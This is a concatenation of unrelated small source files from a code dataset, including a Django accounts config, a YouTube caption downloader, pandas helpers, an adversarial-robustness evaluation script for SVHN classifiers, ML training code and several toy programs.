ax[1].set_xticks(xticks+0.5)\n    # ax[1].set_xticklabels(xticklabels, fontsize=fs-6, rotation='vertical')\n    \nplt.savefig('heatmap_SI_CCA.png', dpi=300,bbox_inches='tight')\nplt.subplots_adjust(hspace=0.07)\nplt.show()","sub_path":"OPTICS/ordination/figure6_SI.py","file_name":"figure6_SI.py","file_ext":"py","file_size_in_byte":8210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"394065130","text":"import sys\r\nfrom PyQt5.QtWidgets import QApplication,QDialog,QMainWindow,QPushButton,QLabel\r\nfrom PyQt5 import uic\r\nfrom alfabeto.Alfabeto import Alfabeto\r\nfrom texto.textoPlano import TextoPlano\r\nfrom procesar.Cifrador import Cifrador\r\nfrom texto.textoCifrado import TextoCifrado\r\nfrom procesar.DesCifrador import Descifrador\r\n\r\n\r\n\r\nclass Ventana(QMainWindow):\r\n    alfabeto = Alfabeto()\r\n    cifrador = Cifrador(alfabeto)\r\n    descifrador = Descifrador(alfabeto)\r\n\r\n    def __init__(self):\r\n        QMainWindow.__init__(self)\r\n        uic.loadUi(\"Interfaz.ui\",self)\r\n        self.texto = self.e_Texto\r\n        self.espacios = self.e_Espacios\r\n        self.cifrar = self.radioCifrar\r\n        self.descifrar = self.radioDescifrar\r\n        self.result = self.resultado\r\n        self.texto.cursorPositionChanged.connect(self.procesar)\r\n\r\n#self.result.toPlainText()\r\n\r\n    def procesar(self):\r\n        if self.cifrar.isChecked():\r\n            textoPlano = self.texto.text()\r\n            self.result.clear()\r\n            num = self.espacios.text()\r\n            if(num.isdigit()):\r\n                espacios = int(num)\r\n                textoCifrado = self.cifrador.cifrarTexto(espacios,textoPlano)\r\n                self.result.appendPlainText(textoCifrado)\r\n            else:\r\n                self.result.appendPlainText(\"Ingrese el numero de celulas\")\r\n        elif self.descifrar.isChecked():\r\n            textoCifrado = self.texto.text()\r\n            self.result.clear()\r\n            num = self.espacios.text()\r\n            if (num.isdigit()):\r\n                espacios = int(num)\r\n                plainText = self.descifrador.descifrarTexto(espacios, textoCifrado)\r\n                self.result.appendPlainText(plainText)\r\n            
else:\r\n self.result.appendPlainText(\"Ingrese el numero de celulas\")\r\n\r\n\r\n\r\n\r\n","sub_path":"juego/codigo/Interfaz.py","file_name":"Interfaz.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"73816498","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf import settings\n\neditor_models = [\n 'articleauthor',\n 'article',\n 'content',\n 'contentgallery',\n 'contentproperty',\n 'contentpropertyclass',\n 'contentpropertyvalue',\n 'event',\n 'eventplace',\n 'externalcontent',\n 'feed',\n 'image',\n 'news',\n 'place',\n 'revision',\n 'route',\n 'routeitem',\n 'seo',\n 'session',\n 'showcase',\n 'showcaseitem',\n 'source',\n 'tag',\n 'version',\n 'subscriber',\n 'rubric',\n]\n\nmarket_models = [\n 'checklistselectitem',\n 'checklist',\n 'checklistcategory',\n 'checklistitem',\n 'checklistcategory_checklist',\n 'checklistitem_checklistcategory',\n 'usercheckliststore',\n 'look',\n 'lookarea',\n 'marketcategory',\n 'product',\n 'offer',\n 'seo',\n 'image',\n 'revision',\n]\n\nGROUPS = {\n 'redactor': {'name': u'Редакторы', 'permissions': editor_models},\n 'account': {\n 'name': u'Аккаунт-менеджеры',\n 'permissions': ['user', 'group']\n },\n 'market': {'name': u'Маркет', 'permissions': market_models},\n}\n\n\n# Examples for ACCOUNTS.\n# Create account for redactor by default:\n# {'username': 'username'}\n#\n# Create account with custom options for all envs:\n# {\n# 'username': 'username',\n# 'envs': {\n# 'all': {\n# 'is_superuser': True,\n# },\n# ...\n# }\n# }\n#\n# Create account with custom options depends by envs:\n# {\n# 'username': 'username',\n# 'envs': {\n# settings.ENVIRONS['master']: {\n# 'groups': [\n# GROUPS['redactor']['name']\n# ], # [u'Редакторы'] by default\n# 'is_staff': True, # True by default\n# 'is_superuser': False, # False by default\n# },\n# ...\n# }\n# }\n\nACCOUNTS = [\n {\n 'username': 'd.egorov',\n 'envs': {'all': {'is_superuser': True}},\n },\n {\n 'username': 'v.zakharov',\n 'envs': {'all': {'is_superuser': True}},\n },\n {\n 'username': 'm.konstantinov',\n 'envs': {'all': {'is_superuser': True}},\n },\n {\n 'username': 'e.oblozhikhina',\n 'envs': {'all': {'is_superuser': True}},\n },\n {\n 'username': 'a.bogoyavlensky',\n 'envs': {'all': {'is_superuser': True}},\n },\n {\n 'username': 't.mestnikova',\n 'envs': {'all': {'is_superuser': True}},\n },\n {\n 'username': 'dm.kuznetsov',\n 'envs': {'all': {'is_superuser': True}},\n },\n {\n 'username': 'y.sidneva',\n 'envs': {\n 'all': {\n 'groups': [\n GROUPS['redactor']['name'],\n GROUPS['account']['name'],\n ]\n },\n # settings.ENVIRONS['master']: {\n # 'groups': [GROUPS['redactor']['name']],\n # },\n },\n },\n {\n 'username': 'o.katina',\n 'envs': {\n 'all': {\n 'groups': [\n GROUPS['redactor']['name'],\n GROUPS['account']['name'],\n ]\n },\n },\n },\n {\n 'username': 's.beri',\n 'envs': {\n 'all': {\n 'groups': [\n GROUPS['redactor']['name'],\n GROUPS['account']['name'],\n ]\n },\n },\n },\n {'username': 'a.shishkin'},\n {'username': 'y.lakhmetkina'},\n {'username': 'a.chechulina'},\n {'username': 'a.pozhidaeva'},\n {'username': 'Nadezhda.Kolosova'},\n {'username': 'a.panasenko'},\n {'username': 'n.bykadorova'},\n {'username': 'o.batylina'},\n {'username': 'd.evseeva'},\n {'username': 'a.karsakova'},\n {\n 'username': 'nkolosova',\n 'envs': {'all': {'groups': []}},\n },\n {\n 'username': 'r.yunichenko',\n 'envs': {'all': {'groups': [], 'is_staff': False}},\n },\n {\n 'username': 'a.kruglov',\n 'envs': {'all': 
{'groups': [], 'is_staff': False}},\n },\n]\n","sub_path":"src/admin_app/core/utils/accounts.py","file_name":"accounts.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"653778616","text":"import urllib.request, urllib.parse, urllib.error\r\nimport html.parser\r\nfrom re import search, DOTALL\r\nimport codecs\r\n\r\n\r\nclass getyoutubecc():\r\n \"\"\" This class allows you to download the caption from a video from you tube\r\n Example:\r\n >>> import getyoutubecc\r\n #import the library\r\n >>> cc = getyoutubecc.getyoutubecc('2XraaWefBd8','en')\r\n # Now in cc.caption_obj are the parsed captions, its syntax is like:\r\n # [{'texlines': [u\"caption first line\", 'caption second line'],\r\n # 'time': {'hours':'1', 'min':'2','sec':44,'msec':232} }]\r\n # Modify the caption as you want if desired\r\n >>> cc.writeSrtFile('captionsfile.srt')\r\n #write the contents to a srt file\r\n Note:\r\n MULTITRACK VIDEO\r\n if video is a multitrack video (or the track has a name) you need\r\n to specify the name of the track:\r\n >>> cc = getyoutubecc.getyoutubecc('pNiFoYt69-w','fr','french')\r\n TRANSLATE VIDEO\r\n if you prefer the automatic translation to another language use\r\n the lang code\r\n >>> cc = getyoutubecc.getyoutubecc('pNiFoYt69-w','fr','french', tlang:'es')\r\n \"\"\"\r\n\r\n caption_obj = {}\r\n\r\n \"\"\" This object contains the fetched captions. Use this to treat the captions or whatever\"\"\"\r\n def __init__(self, video_id, lang=\"en\", track=\"\", tlang=\"\" ):\r\n \"\"\" \"\"\"\r\n #Obtain the file from internet\r\n cc_url = \"http://www.youtube.com/api/timedtext?v=\" + video_id + \"&lang=\" + lang + \"&name=\" + track + \"&tlang=\" + tlang\r\n print(\"video id: \" + video_id)\r\n print(\"video language: \" + lang)\r\n print(\"video track: \" + track)\r\n print(\"translate video to: \" + tlang)\r\n try:\r\n cc = urllib.request.urlopen(cc_url).read()\r\n except:\r\n print(\"Problem with connection\")\r\n #parse the file to make a easy to modify object with the captions and its time\r\n if self.caption_obj == []:\r\n print(\"url \" + cc_url + \" was an empty response. Multitrack video?\")\r\n self.caption_obj = self._parseXml(cc);\r\n\r\n def writeSrtFile(self,filename=\"caption\"):\r\n srt_lines = self._generateSrt(self.caption_obj) #generate the srt file\r\n srtfile = open(filename,'wb')\r\n for line in srt_lines:\r\n srtfile.write( line.encode('utf8') + \"\\n\")\r\n\r\n def _parseXml(self,cc):\r\n \"\"\" INPUT: XML file with captions\r\n OUTPUT: parsed object like:\r\n [{'texlines': [u\"So, I'm going to rewrite this\", 'in a more concise form as'],\r\n 'time': {'hours':'1', 'min':'2','sec':44,'msec':232} }]\r\n \"\"\"\r\n htmlpar = html.parser.HTMLParser()\r\n cc = cc.split(\"\") # ['So, it will\\nhas time', 'blah', ..]\r\n captions = []\r\n for line in cc:\r\n if search('text', line):\r\n time = search(r'start=\"(\\d+)(?:\\.(\\d+)){0,1}', line).groups() # ('2997','929')\r\n time = (int(time[0]), int(0 if not time[1] else time[1]) )\r\n #convert seconds and millisec to int\r\n text = search(r'\">(.*)', line, DOTALL).group(1) # extract text i.e. 
'So, it will\\nhas time'\r\n textlines = [ htmlpar.unescape(htmlpar.unescape( str(lineunparsed,\"utf-8\") )) for lineunparsed in text.split('\\n') ]\r\n #unscape chars like & or '\r\n ntime = {'hours':time[0]/3600,\"min\":time[0]%3600/60,\"sec\":time[0]%3600%60,\"msec\":time[1]}\r\n captions.append({'time':ntime,'textlines':textlines})\r\n return captions\r\n\r\n def _generateSrt(self,captions):\r\n \"\"\" INPUT: array with captions, i.e.\r\n [{'texlines': [u\"So, I'm going to rewrite this\", 'in a more concise form as'],\r\n 'time': {'hours':'1', 'min':'2','sec':44,'msec':232} }]\r\n OUTPUT: srtformated string\r\n \"\"\"\r\n caption_number = 0\r\n srt_output = []\r\n for caption in captions:\r\n caption_number += 1\r\n #CAPTION NUMBER\r\n srt_output.append(str(caption_number))\r\n #TIME\r\n time_from = ( caption['time']['hours'], caption['time']['min'], caption['time']['sec'], caption['time']['msec'] )\r\n if len(captions)>caption_number:\r\n #display caption until next one\r\n next_caption_time = captions[caption_number]['time']\r\n time_to = ( next_caption_time['hours'], next_caption_time['min'], next_caption_time['sec'], next_caption_time['msec'] )\r\n else:\r\n #display caption for 2 seconds\r\n time_to = (time_from[0],time_from[1]+2,time_from[2],time_from[3])\r\n srt_output.append( (\":\").join([str(i) for i in time_from[0:-1]])+\",\"+str(time_from[-1])+\" --> \"+(\":\").join([str(i) for i in time_to[0:-1]])+\",\"+str(time_to[-1]))\r\n #CAPTIONS\r\n for caption_line in caption['textlines']:\r\n srt_output.append(caption_line)\r\n #Add two empty lines to serarate every caption showed\r\n srt_output.append(\"\")\r\n srt_output.append(\"\")\r\n return srt_output\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n import getopt\r\n sys.argv\r\n\r\n videoid = ''\r\n lang = ''\r\n track = ''\r\n tlang = ''\r\n\r\n try:\r\n opts, args = getopt.getopt(sys.argv[1:],\"hv:l:t:T:\",[\"videoid=\",\"language=\",\"track=\",\"translate=\"])\r\n except getopt.GetoptError:\r\n print('getyoutubecc -v -l -t -T ')\r\n print('Example: getyoutubecc -v pNiFoYt69-w -l fr -t french -T es')\r\n print('Example: getyoutubecc -v 2XraaWefBd8 -l en ')\r\n sys.exit(2)\r\n for opt, arg in opts:\r\n if opt == '-h':\r\n print('getyoutubecc -v -l -t -T ')\r\n print('Example: getyoutubecc -v pNiFoYt69-w -l fr -t french -T es')\r\n print('Example: getyoutubecc -v 2XraaWefBd8 -l en ')\r\n print('NOTE: if video has a track name, the -t argument is mandatory ')\r\n sys.exit()\r\n elif opt in (\"-v\", \"--videoid\"):\r\n videoid = arg\r\n elif opt in (\"-l\", \"--language\"):\r\n lang = arg\r\n elif opt in (\"-t\", \"--track\"):\r\n track = arg\r\n elif opt in (\"-T\", \"--translate\"):\r\n tlang = arg\r\n if videoid != '':\r\n print(\"downloading \" + videoid + \" captions\")\r\n cc = getyoutubecc(videoid, lang, track, tlang)\r\n cc.writeSrtFile(videoid + '.srt')\r\n else:\r\n print('getyoutubecc -v -l -t -T ')\r\n print('Example: getyoutubecc -v pNiFoYt69-w -l fr -t french -T es')\r\n print('Example: getyoutubecc -v 2XraaWefBd8 -l en ')\r\n print('NOTE: if video has a track name, the -t argument is mandatory ')\r\n","sub_path":"videogrep/tools/getyoutubecc.py","file_name":"getyoutubecc.py","file_ext":"py","file_size_in_byte":7026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"268373067","text":"\n#Definition of ListNode\nclass ListNode(object):\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\n#Definition of TreeNode:\nclass 
TreeNode:\n    def __init__(self, val):\n        self.val = val\n        self.left, self.right = None, None\n\nclass Solution:\n    \"\"\"\n    @param head: The first node of linked list.\n    @return: a tree node\n    \"\"\"\n    curt = None\n    def sortedListToBST(self, head):\n        # write your code here\n        def len_bst(head):\n            count = 0\n            while head != None:\n                count += 1\n                head = head.next\n            return count\n        \n        def lst_to_bst_helper(length):\n            global curt\n            if length <= 0:\n                return None\n            left = lst_to_bst_helper(length // 2) # integer division; the original used /, which yields floats under Python 3\n            root = TreeNode(curt.val)\n            root.left = left\n            curt = curt.next\n            right = lst_to_bst_helper(length - 1 - length // 2)\n            root.right = right\n            return root\n        \n        if head == None:\n            return head\n        length = len_bst(head)\n        global curt\n        curt = head\n        return lst_to_bst_helper(length)\n\nif __name__ == \"__main__\":\n    head = ListNode(1)\n    head.next = ListNode(2)\n    head.next.next = ListNode(3)\n    sol = Solution()\n    bst = sol.sortedListToBST(head)\n","sub_path":"algorithm/official_notes/4/problems_linkList/(106) Convert Sorted List to Binary Search Tree.py","file_name":"(106) Convert Sorted List to Binary Search Tree.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"367523231","text":"# Lint as: python2, python3\n\"\"\"Pandas utilities for //ads/metrics/lib/meterstick.\"\"\"\n\nfrom __future__ import division\n\nimport numpy as np\nimport pandas as pd\n\n\ndef select_by_position(data, idx):\n  \"\"\"Gets row(s) of data corresponding to position idx.\n\n  Args:\n    data: a DataFrame\n    idx: a position (integer from 0 to len(data)-1)\n\n  Returns:\n    A DataFrame containing the rows corresponding to\n    position idx.\n  \"\"\"\n  try:\n    # Double brackets force Pandas to return a DataFrame.\n    return data.iloc[[idx]]\n  except KeyError:\n    # Return a correctly shaped DataFrame of NaNs.\n    if isinstance(data.index, pd.MultiIndex):\n      return np.nan * data.reset_index(level=0, drop=True)\n    else:\n      return np.nan * data.reset_index(drop=True)\n\n\ndef select_by_label(data, idx):\n  \"\"\"Gets row(s) of data corresponding to index label idx.\n\n  Args:\n    data: a DataFrame\n    idx: an index label\n\n  Returns:\n    A DataFrame containing the rows corresponding to\n    index label idx.\n  \"\"\"\n  if isinstance(data.index, pd.MultiIndex):\n    try:\n      # Pandas always returns DataFrame for a MultiIndex.\n      return data.loc[idx]\n    except KeyError:\n      # If idx not found, return a data frame of all NaNs\n      # with the first level dropped.\n      return np.nan * data.reset_index(level=0, drop=True)\n  else:\n    # Force Pandas to return a DataFrame.\n    inds = data.index.isin([idx])\n    if inds.any():\n      # This was the fastest solution in speed testing.\n      return data[inds].reset_index(drop=True)\n    else:\n      return np.nan * data.reset_index(drop=True)\n\n\ndef concat(objects, axis=0, keys=None, name=None):\n  \"\"\"Concatenates Pandas objects.\n\n  Works similarly to pd.concat(), except it is able to\n  concatenate scalars as well.\n\n  Args:\n    objects: a list of scalars, Series, or DataFrames\n    axis: 0 or 1, indicating which axis to concatenate along\n    keys: the label to add for each element that gets concatenated\n    name: the name for the Series or DataFrame\n\n  Returns:\n    A Series or a DataFrame\n\n  Raises:\n    ValueError: results could not be concatenated\n  \"\"\"\n  if all(isinstance(obj, (pd.Series, pd.DataFrame)) for obj in objects):\n    output = pd.concat(objects, axis=axis, keys=keys, names=[name])\n  elif all(np.isscalar(obj) for obj in objects):\n    if axis == 0:\n      output = pd.Series(objects,
index=pd.Index(keys, name=name))\n elif axis == 1:\n output = pd.DataFrame([objects], columns=keys)\n else:\n raise ValueError(\"Could not concatenate objects because the types \"\n \"of the objects did not match.\")\n\n return output\n\n\ndef index_product(index1, index2):\n \"\"\"Produces an index containing the product of the levels of two indexes.\n\n Functions similarly to pd.MultiIndex.from_product(), but is able to\n take products of MultiIndexes.\n\n Args:\n index1: A pandas Index (possibly a MultiIndex)\n index2: A pandas Index (possibly a MultiIndex)\n\n Returns:\n A Pandas MultiIndex whose levels are the product of all levels from\n index1 with all levels from index2.\n\n Raises:\n ValueError: Both indexes are None, or the indexes have non-unique\n levels.\n \"\"\"\n # return index2 if index1 is None\n if index1 is None:\n if index2 is None:\n raise ValueError(\"Both indexes are None.\")\n else:\n return index2\n # return index1 if index2 is None\n elif index2 is None:\n return index1\n\n # check that the values in the indexes are unique\n if not index1.is_unique or not index2.is_unique:\n raise ValueError(\"Can only take the product of two indexes with \"\n \"unique levels.\")\n\n # Get a list of the possible index values.\n # (Each index value is itself a list.)\n index_values = []\n for i in index1:\n for j in index2:\n index_value = []\n if isinstance(index1, pd.MultiIndex):\n index_value.extend(i)\n else:\n index_value.append(i)\n if isinstance(index2, pd.MultiIndex):\n index_value.extend(j)\n else:\n index_value.append(j)\n index_values.append(index_value)\n\n # Get the names for the index levels.\n index_names = index1.names + index2.names\n\n # Construct MultiIndex from the values and the names\n return pd.MultiIndex.from_tuples(index_values, names=index_names)\n\n\ndef index_product_from_vars(data, variables, expand):\n \"\"\"Constructs an index consisting of combinations of levels in vars.\n\n Args:\n data: A Pandas DataFrame.\n variables: A list of strings representing variables of the DataFrame.\n expand: A boolean; if True, expand index to include all possible\n combinations of levels, whether or not they appear in the data or not.\n\n Returns:\n A Pandas Index consisting of all combinations of levels in the variables.\n \"\"\"\n if expand:\n return pd.MultiIndex.from_product(\n [data[var].drop_duplicates() for var in variables],\n names=variables)\n else:\n return (data[variables].drop_duplicates().\n set_index(variables).index)\n\n\ndef any_null(obj):\n \"\"\"Checks if there are any null values in obj.\n\n Args:\n obj: A scalar, Series, or DataFrame.\n\n Returns:\n A boolean. 
True if there are any NaN values in obj.\n\n Raises:\n ValueError: if obj is not a scalar, Series, or DataFrame\n \"\"\"\n if np.isscalar(obj):\n return pd.isnull(obj)\n elif isinstance(obj, pd.Series):\n return obj.isnull().any()\n elif isinstance(obj, pd.DataFrame):\n return obj.isnull().values.any()\n else:\n raise ValueError(\"obj is not a scalar, Series, or DataFrame.\")\n","sub_path":"pdutils.py","file_name":"pdutils.py","file_ext":"py","file_size_in_byte":5485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"289988766","text":"from QLNES import *\nfrom pickle import dump,load\nimport sys\nfrom sys import argv\nfrom datetime import datetime\nfrom os import mkdir\nfrom os.path import exists\nif not exists(\"QLNES\"):\n mkdir(\"QLNES\")\npath=\"QLNES/\"+str(datetime.now())+\"/\"\nmkdir(path)\nsys.stdout=open(path+\"log.txt\",\"w\")\nData={}\nsucc=0\ntot=0\nif argv[1]==\"undef\":\n from madrySVHNUndefWrapper import *\n target_set=load(open(\"indices.pkl\",\"rb\"))\nelse:\n from madrySVHNWrapper import *\n target_set=load(open(\"def_indices.pkl\",\"rb\"))\nfor j in range(0,len(target_set),10):\n tot+=10\n print(\"Starting attack on batch\", j//10)\n corr=np.argmax(mymodel.predict(x_test[target_set[j:j+10]]),1)==y_test.reshape(-1)[target_set[j:j+10]]\n ret=attack(mymodel,x_test[target_set[j:j+10]],100,0.001,0.001,0.001,5,1,0.9,8/255,ongoing=corr,max_queries=20000)\n dump(ret[0].reshape(10,32,32,3),open(path+\"image_\"+str(j)+\"_to_\"+str(j+9)+\".pkl\",\"wb\"))\n for k in range(10):\n Data[target_set[j+k]]=(ret[2][k],ret[1][k])\n succ+=sum(ret[2])\n print(\"Success rate is\",100*succ/tot)\n dump(Data,open(path+\"data.pkl\",\"wb\"))\n","sub_path":"SVHN/testQLNES.py","file_name":"testQLNES.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"567779554","text":"# *------------------------------------------------------------------\n# * Server.py\n# *\n# * April. 2013, Mihyar Baroudi\n# *\n# * Copyright (c) 2010-2013 by cisco Systems, Inc.\n# * All rights reserved.\n# * ------------------------------------------------------------------\n\nimport onep.core.exception.OnepIllegalArgumentException\nfrom onep.core.util.Enum import enum\n\nclass Server(object):\n '''\n Server class describes the AAA Server that is used for user\n authentication. Each server is characterized by its IP Address\n and the AAA protocol.\n '''\n\n OnepAAAProtocol = enum(\n 'ONEP_AAA_PROTOCOL_RADIUS',\n 'ONEP_AAA_PROTOCOL_TACACSPLUS',\n 'ONEP_AAA_PROTOCOL_LOCAL')\n '''AAA Protocol. 
Only Radius, TACACS+ and Local are currently supported'''\n\n def __init__(self, address, protocol):\n '''AAA server constructor, used internally'''\n self.address = address\n '''The AAA Server IP Address'''\n self.protocol = protocol\n '''The AAA protocol supported by the AAA Server'''\n","sub_path":"X-COPY/infra/onep/presentation/python/onep/aaa/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"381797528","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 1 21:15:15 2021\n\n@author: Evgeniya Vorontsova\n\nLC Problem 58 Length of Last Word\n\nGiven a string s consisting of some words \nseparated by some number of spaces, \nreturn the length of the last word in the string.\n\nA word is a maximal substring consisting of non-space characters only.\n\nExample 1:\n\nInput: s = \"Hello World\"\nOutput: 5\nExplanation: The last word is \"World\" with length 5.\n\nExample 2:\n\nInput: s = \" fly me to the moon \"\nOutput: 4\nExplanation: The last word is \"moon\" with length 4.\n\nExample 3:\n\nInput: s = \"luffy is still joyboy\"\nOutput: 6\nExplanation: The last word is \"joyboy\" with length 6.\n\nConstraints:\n\n 1 <= s.length <= 10^4\n s consists of only English letters and spaces ' '.\n There will be at least one word in s.\n\"\"\"\n\nclass Solution:\n def lengthOfLastWord(self, s: str) -> int:\n s = s.strip()\n len_s = len(s)\n i = len_s - 1\n last_word = 0\n while s[i] != \" \" and i >= 0:\n last_word = last_word + 1\n i = i - 1\n return last_word\n\n# Tests\ns = \" fly me to the moon \"\nclass_instance = Solution()\nrez = Solution.lengthOfLastWord(class_instance, s) \nprint(rez) \n","sub_path":"058/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"612621987","text":"#!/bin/python3\n# -*- conding: utf-8 -*-\n\n\"\"\"\n--------------------\n TD: nombre mystère\n--------------------\n\"\"\"\n\nfrom random import randint\nfrom time import sleep\nimport stdiomask\n\ndef dispMenu():\n\tmenu = [\n\t\t\"0. Noob\\t\\t\\t[0-1]\",\n\t\t\"1. Facile\\t\\t[0-10]\",\n\t\t\"2. Normal\\t\\t[0-100]\",\n\t\t\"3. Difficile\\t\\t[0-1000]\",\n\t\t\"4. Hardcore\\t\\t[0-10000]\",\n\t\t\"5. Cauchemardesque\\t[0-100000]\",\n\t\t\"6. ROXOR\\t\\t[0-1000000]\",\n\t]\n\n\tprint(\"\\nChoisit le niveau de difficulté:\")\n\n\tfor item in menu:\n\t\tprint(item)\n\t\tsleep(.01)\n\n\tprint(\"\\n99. Exit\")\n\n\treturn(len(menu) - 1)\n\ndef multiPlayer():\n\tanswer = input(\"Tu veux jouer avec un pote ou pas ? 
(Yes/No)\\n> \")\n\treturn True if(answer in (\"y\", \"Y\", \"Yes\")) else False\n\ndef playerName():\n\tprint(\"Entrer vos noms les fifous\")\n\n\treturn [\n\t\tinput(\"Player 1: \"),\n\t\tinput(\"Player 2: \")\n\t]\n\ndef game(max, multi):\n\tplayer = playerName\n\tM = randint(0, max)\n\tN = -1\n\ti = 1\n\n\twhile(N != M):\n\t\ttry:\n\t\t\tshowPlayer = i%2 if(multi) else 0\n\t\t\tmsgInput = \"\\n{}, entre un nombre !\\n> \".format(player[showPlayer])\n\t\t\tN = int(stdiomask.getpass(prompt = msgInput)) if(multi) else int(input(msgInput))\n\t\t\tprint(\"C'est imense\") if(N > M) else print(\"C'est rikiki\")\n\t\t\ti += 1\n\n\t\texcept Exception:\n\t\t\tprint(\"On a dit un nombre idiot !\")\n\n\tprint(\"\\nGG WP {} !\".format(player[showPlayer]))\n\tprint(\"T'as tout de même fait {} Essaie(s)\".format(i))\n\ndef retry():\n\tanswer = input(\"On s'en refait une ? (Yes/No)\\n> \")\n\n\tif(answer in (\"y\", \"Y\", \"Yes\")):\n\t\tdispMenu()\n\t\treturn True\n\n\telse:\n\t\treturn False\n\ndef main():\n\tdiffCount = dispMenu()\n\n\twhile(True):\n\t\ttry:\n\t\t\tdiff = int(input(\"\\n> \"))\n\n\t\t\tif((diff >= 0) and (diff <= diffCount)):\n\t\t\t\tgame(10**diff, multiPlayer())\n\n\t\t\t\tif not(retry()):\n\t\t\t\t\tbreak\n\n\t\t\telif(diff == 99):\n\t\t\t\tbreak\n\n\t\t\telse:\n\t\t\t\tprint(\"T'es un p'tit mâlin toi dit donc !\")\n\n\t\texcept Exception:\n\t\t\tprint(\"Pas de carabistouille enfoirée !\")\n\nif(__name__ == '__main__'):\n\tplayerName = playerName()\n\tmain()\n\tprint(\"Bye kheyou !\")\n","sub_path":"TRASH/mysteryNumber.py","file_name":"mysteryNumber.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"233727722","text":"\nfrom django.contrib import admin\nfrom django.urls import path,include\nfrom django.conf.urls import handler404, handler500\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include('home.urls')),\n path('accounts/', include('accounts.urls')),\n path('accounts/', include('django.contrib.auth.urls')),\n path('blog/',include('blog.urls'))\n]\n\nhandler404 = 'home.views.error'\nhandler500 = 'home.views.error'","sub_path":"Pythonweb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"24810495","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nimport operator\nimport requests\nfrom bs4 import BeautifulSoup\nimport sqlite3\n\n\n\n#conn = sqlite3.connect(\"db.sqlite3\")\nconn=sqlite3.connect(\"/workspace/USpressM3/db.sqlite3\")\ncur = conn.cursor()\n\nwith open ('negative-words.txt') as fp:\n for line in fp:\n line2 = line.rstrip('\\n')\n SQL = \"INSERT OR IGNORE INTO negativewords (words) VALUES\" + \"(\" + \"'\" + line2 + \"'\" + \")\"\n print(SQL)\n\n cur.execute(SQL)\n\ncur.execute(\"select * from negativewords\")\nrows = cur.fetchall()\nprint(\"If you see the following, that means the DB is working!\")\nprint(rows)\n\nconn.commit()\nconn.close()\n","sub_path":"USpressM3/DBInsertN.py","file_name":"DBInsertN.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"11513472","text":"import sys\nimport warnings\nimport argparse\nimport numpy as np\nimport pandas as pd\nfrom datasets.preprocessing import process_data\nfrom saved_model import model\nfrom keras.models import Model\nfrom keras.callbacks import 
EarlyStopping\nwarnings.filterwarnings(\"ignore\")\n\n\ndef train_lstm(model, x_train, y_train, name):\n\n    model.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['accuracy'])\n\n    hist = model.fit(\n        x_train, y_train,\n        batch_size=10,\n        epochs=20,\n        validation_split=0.05)\n\n    model.save('saved_model/' + name + '.h5')\n    df = pd.DataFrame.from_dict(hist.history)\n    df.to_csv('saved_model/' + name + ' loss.csv', encoding='utf-8', index=False)\n\ndef train_cnn(model, x_train, y_train, name):\n\n    model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\n\n    hist = model.fit(\n        x_train, y_train,\n        batch_size=25,\n        epochs=20,\n        validation_split=0.05)\n\n    model.save('saved_model/' + name + '.h5')\n    df = pd.DataFrame.from_dict(hist.history)\n    df.to_csv('saved_model/' + name + ' loss.csv', encoding='utf-8', index=False)\n\ndef lstm(x_train, y_train):\n    x_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))\n    m = model.lstm_model([12, 128, 64, 1])\n    train_lstm(m, x_train, y_train, \"lstm\")\n\ndef cnn(x_train, y_train):\n    x_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))\n    m = model.cnn_model()\n    train_cnn(m, x_train, y_train, \"cnn\")\n\ndef main():\n\n    lag = 12\n    training_data = 'datasets/train.csv'\n    test_data = 'datasets/test.csv'\n    x_train, y_train, _, _, _ = process_data(training_data, test_data, lag)\n    \n    i = 0\n\n    while i < 2:\n\n        lstm(x_train, y_train)\n\n        cnn(x_train, y_train)\n\n        i = i + 1\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"361676842","text":"# Checks that input is a number between 1 and 200 (inclusive)\ndef num_check(question):\n    valid = False\n    while not valid:\n\n        error = \"Please enter a number that is more than (or equal to) one\"\n\n        try:\n\n            # Ask user to enter a number\n            response = float(input(question))\n\n            # Checks number is more than or equal to one and less than or equal to 200\n            if 1 <= response <= 200:\n                return response\n\n            # Outputs error if input is invalid\n            else:\n                print(error)\n                print()\n\n        except ValueError:\n            print(error)\n            print()\n\n# Main routine goes 